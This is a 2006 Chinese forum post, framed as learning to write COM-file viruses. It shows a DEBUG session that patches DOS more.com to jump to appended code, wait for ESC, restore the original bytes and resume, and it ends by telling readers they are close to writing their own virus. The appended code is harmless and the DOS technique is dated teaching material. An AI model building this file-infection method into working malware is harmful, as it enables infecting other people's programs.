版块导航: 正在加载中...

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

>论坛更新日志 (4235)
>虫友互识 (1150)
>考研 (1062)
>导师招生 (786)
>文献求助 (140)
>硕博家园 (82)
>博后之家 (46)
>考博 (44)
>休闲灌水 (37)
>基金申请 (31)
>论文投稿 (30)
>教师之家 (22)
>数学 (18)
>找工作 (16)
>绿色求助(高悬赏) (15)
>论文道贺祈福 (13)

返回列表

当前主题已经存档。

sdlj8051

金虫 (著名写手)

应助: 0 (幼儿园)
贵宾: 0.1
金币: 1149.8
红花: 3
帖子: 2254
在线: 18.1小时
虫号: 71297
注册: 2005-05-30
专业: 电路与系统

[交流] 学写com型病毒的技术

COM文件是一种单段执行结构，起源于CPM-86操作系统，其执行文件代码和执行时内存影象完全相同，其始执行偏移地址为100H，对应于文件的偏移0。运行我们的DEBUG程序，我们先来做一个练习。我们拿DOS6.22中的more.com来做实验。

C:\>debug more.com
-u
-u
0CA4:0100 B8371E MOV AX,1E37 ;注意前三个字节的内容
0CA4:0103 BA3008 MOV DX,0830
0CA4:0106 3BC4 CMP AX,SP
0CA4:0108 7369 JNB 0173
0CA4:010A 8BC4 MOV AX,SP
0CA4:010C 2D4403 SUB AX,0344
0CA4:010F 90 NOP
0CA4:0110 25F0FF AND AX,FFF0
0CA4:0113 8BF8 MOV DI,AX
0CA4:0115 B9A200 MOV CX,00A2
0CA4:0118 90 NOP
0CA4:0119 BE7E01 MOV SI,017E
0CA4:011C FC CLD
0CA4:011D F3 REPZ
0CA4:011E A5 MOVSW
0CA4:011F 8BD8 MOV BX,AX
-r
AX=0000 BX=0000 CX=09F1 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=0CA4 ES=0CA4 SS=0CA4 CS=0CA4 IP=0100 NV UP EI PL NZ NA PO NC
0CA4:0100 B8371E MOV AX,1E37
-a af1
0CA4:0AF1 mov ah,0
0CA4:0AF3 int 16 ；等待按键
0CA4:0AF5 cmp al,1b ；等待ESC键
0CA4:0AF7 jnz af1
0CA4:0AF9 mov word ptr [100],37b8 ；恢复程序开始的三个字节
0CA4:0AFF mov byte ptr [102],1e
0CA4:0B04 push cs ；进栈CS:100
0CA4:0B05 mov si,100
0CA4:0B08 push si
0CA4:0B09 retf ;RetF回到CS:100，程序开始处
0CA4:0B0A
-a 100
0CA4:0100 jmp af1 ；将程序开头改成跳转到修改的模块
0CA4:0103
-rcx
CX 09F1
:a0a
-w
Writing 00A0A bytes
-q
修改完了，我们来执行一下more，发现什么没有？哈哈，如果不按ESC键程序无法执行，流程很简单：
1、把程序开始处的指令修改成了跳转到最后的添加的程序位置。
2、最先执行添加的程序（相当于病毒模块），等待ESC键
3、按下ESC键后修改回程序开始的指令，跳转回最开始。（执行原始程序）
好了，大家如果能看懂上面这段话，那你离编写自己的COM病毒将不会很远了。

[ Last edited by 幻影无痕 on 2006-10-17 at 09:03 ]

回复此楼

» 猜你喜欢

272分材料子求调剂已经有52人回复
一志愿哈工大 085600 277 12材科基求调剂已经有31人回复
290求调剂已经有16人回复
材料工程085601，270求调剂已经有35人回复
085600材料与化工349分求调剂已经有4人回复
22408 352分求调剂已经有5人回复
268分085602化学工程调剂已经有30人回复
0854调剂已经有6人回复
211本科材料化工求调剂已经有18人回复
化学070300 求调剂已经有6人回复

1楼 2006-08-26 09:55:18

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

sdlj8051

金虫 (著名写手)

2楼2006-12-29 01:09:42

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

相关版块跳转我要订阅楼主 sdlj8051 的主题更新

返回列表

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 297工科，求调剂? +4	河南农业大学-能 2026-04-12	4/200	2026-04-12 19:07 by xhongshu小红薯
[考研] 一志愿085502，267分求调剂 +13	再忙也要吃饭啊 2026-04-08	14/700	2026-04-12 18:40 by laoshidan
[考研] 326求调剂 +6	Shansyn 2026-04-10	6/300	2026-04-12 09:46 by hammer3
[考研] 291求调剂 +8	关忆北. 2026-04-11	8/400	2026-04-12 09:32 by 逆水乘风
[考研] 295求调剂 +6	?要上岸? 2026-04-05	7/350	2026-04-11 19:02 by laoshidan
[考研] 求调剂 +10	璃茉一定上岸 2026-04-10	10/500	2026-04-11 13:31 by 1005715100
[考研] 298求调剂 +5	残荷新柳 2026-04-07	5/250	2026-04-11 11:02 by 紫曦紫棋
[考研] 求调剂 +13	雪逢冬 2026-04-10	13/650	2026-04-11 09:58 by 猪会飞
[考研] 080500求调剂 +17	黄宇博 2026-04-06	17/850	2026-04-11 08:36 by zhq0425
[考研] 291 求调剂 +29	化工2026届毕业� 2026-04-09	29/1450	2026-04-10 22:55 by dick_runner
[考研] 0858求调剂 5+5	Gky09300550， 2026-04-10	8/400	2026-04-10 19:13 by chemisry
[考研] 344求调剂 +7	丶风雪夜归人丶 2026-04-09	7/350	2026-04-10 12:05 by pengliang8036
[考研] 初试分332，一志愿报考西北工业大学， +11	故人?? 2026-04-09	11/550	2026-04-09 21:54 by JineShine
[考研] 本科郑州大学，一志愿华东师范大学282求调剂 +23	熊哥xtk 2026-04-07	26/1300	2026-04-09 17:17 by 18446523
[考研] 招收有机化学、化工，药学，食品灯专业学生 +3	yrfhjgdj 2026-04-08	3/150	2026-04-09 10:15 by QYQX_123
[考研] 求调剂 +8	吃口冰激凌 2026-04-07	8/400	2026-04-09 08:03 by 5268321
[考研] 331求调剂 +5	luoxin0706. 2026-04-08	5/250	2026-04-08 22:15 by zhouyuwinner
[考研] 化工学硕 285求调剂 +26	Wisjxn 2026-04-07	26/1300	2026-04-08 14:42 by screening
[考研] 305求调剂 +4	77Qi 2026-04-06	4/200	2026-04-07 20:06 by shanqishi
[考研] 考研调剂 +3	Wwwwwww哇 2026-04-06	3/150	2026-04-06 20:55 by lbsjt